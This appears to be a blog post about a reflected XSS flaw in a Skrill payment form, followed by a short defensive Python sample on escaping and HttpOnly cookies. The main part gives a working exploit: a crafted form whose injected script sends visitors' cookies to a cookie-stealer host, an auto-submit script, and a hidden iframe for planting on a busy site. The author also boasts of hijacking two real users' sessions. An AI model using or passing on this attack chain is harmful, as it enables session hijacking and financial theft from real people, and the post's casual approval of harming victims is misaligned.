I have been studying the wonderful world of hacking over the last few months. A book I read on pen-testing suggested looking at http://www.reddit.com/r/xss for news on XSS, new methods, examples, etc.

XSS (cross-site scripting) is basically when you can get your own JavaScript to run inside a website's pages, in the browsers of the people who visit it.

I have never used reddit before; now I am hooked on it. I always thought of XSS as a strange problem. I didn't understand how someone can attack your website or really do anything with XSS, other than redirect users to another website or so, and to achieve that the XSS would have to be stored in a database or something and displayed to other users.

Then I realized that XSS is one of the worst holes you can have on your website. One can use an XSS attack to steal your cookies and, with them, be authorized as you: they get access wherever you have access.

So today I saw this: http://www.reddit.com/r/xss/comments/2jea1h/xss_on_payment_form_skrill/

This was a brief skrill.com XSS vulnerability. It was active for 24 hours. This guy found a form where the input is not filtered. Specifically, the

detail1_text

and

detail2_text

parameters are not filtered (they are reflected back into the page as-is), so you can push JavaScript code into that website.
So, how to exploit it (I actually tried this and it worked):

You will have to create a form:

 <form id="myform" action="https://www.moneybookers.com/app/payment.pl">

  <input type="hidden" name="pay_to_email" value="mesyre@gmail.com">
  <input type="hidden" name="language" value="EN">
  <input type="hidden" name="amount" value="3">
  <input type="hidden" name="currency" value="EUR">

  <input type="hidden" name="amount2_description" value="Product Price:">
  <input type="hidden" name="amount2" value="2">
  <input type="hidden" name="detail1_description" value="Product:">
  <input type="hidden" name="detail1_text" value="test" class="col-md-9 col-xs-12"/>

  <input type="hidden" name="amount3_description" value="Product Price:">
  <input type="hidden" name="amount3" value="1">
  <input type="hidden" name="detail2_description" value="Product:">
  <input type="hidden" name="detail2_text" value="&quot;&gt;&lt;script language= &quot;JavaScript&quot;&gt;document.location=&quot;http://www.mysite.com/cookiestealer/index.php?cookie=&quot; + document.cookie;document.location=&quot;http://www.mysite.com&quot;&lt;/script&gt;">

  <input type="submit" value="h" class="col-md-3 col-xs-12"/>
 </form>

The cookie stealer is a basic script (it's included in the link above). Now, because people don't submit forms they don't know about, we add some JavaScript to auto-submit the form:

 <script>
   document.forms["myform"].submit();
 </script>

And load it into some other (preferably high-traffic) website:

	<iframe width="0" height="0" src="http://www.mysite.com/xss.php"></iframe>

Then what happens: every time someone visits your website, the hidden frame submits the form and you get their cookies. Then you visit skrill.com using their cookies, and you are logged in as them.

I actually tried this. I left it online for 10 hours on a high-traffic website, I got 2 valid cookies, used them and logged in. I could easily have sent the money to my account. Now, actually being able to do that is more important to me than actually stealing from the poor guys that I exploited, but it was sure the highlight of my hacking attempts. It's not every day that you can say you hacked skrill.com.

And it was all done with kindergarten-level knowledge in terms of hacking and some luck.

I always thought that those holes don't exist anymore, especially in large websites. But I was wrong. Developers make mistakes every day.

This was online for a full day before they fixed it.
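What the fix on the payment page's side has to do, as an added illustration that is not code from the post or from Skrill: encode detail1_text/detail2_text for the attribute they are reflected into, so a value that starts with a quote cannot close the attribute and open a script element, and mark the session cookie HttpOnly so document.cookie cannot read it in the first place. The function names, the marker payload and the cookie name are my own assumptions.

```python
import html
import re

# Constructed sample value shaped like the post's payload: it closes the
# value="..." attribute, opens a script element, then starts a new attribute
# so the template's trailing quote is swallowed. Harmless marker, no stealer.
INJECTED = '"><script>/*marker*/</script><input type="hidden" x="'


def render_unsafe(name: str, value: str) -> str:
    """Reflect the parameter verbatim into the attribute (the bug the post describes)."""
    return f'<input type="hidden" name="{name}" value="{value}">'


def render_escaped(name: str, value: str) -> str:
    """Encode for the HTML attribute context: & < > " ' become entities,
    so the browser treats the whole value as the attribute's text."""
    return f'<input type="hidden" name="{name}" value="{html.escape(value, quote=True)}">'


_TAG_OPEN = re.compile(r"<[A-Za-z]")


def attribute_intact(rendered: str) -> bool:
    """True when the rendered snippet still contains exactly one element,
    i.e. the user value did not break out of the attribute."""
    return len(_TAG_OPEN.findall(rendered)) == 1


def session_cookie_header(name: str, value: str) -> str:
    """Set-Cookie value for a session token that scripts cannot read via
    document.cookie (HttpOnly) and that is only sent over TLS (Secure)."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("escaped", render_escaped)):
        out = render("detail2_text", INJECTED)
        print(f"{label:8} intact={attribute_intact(out)} {out}")
    print(session_cookie_header("SESSION", "constructed-token-value"))
```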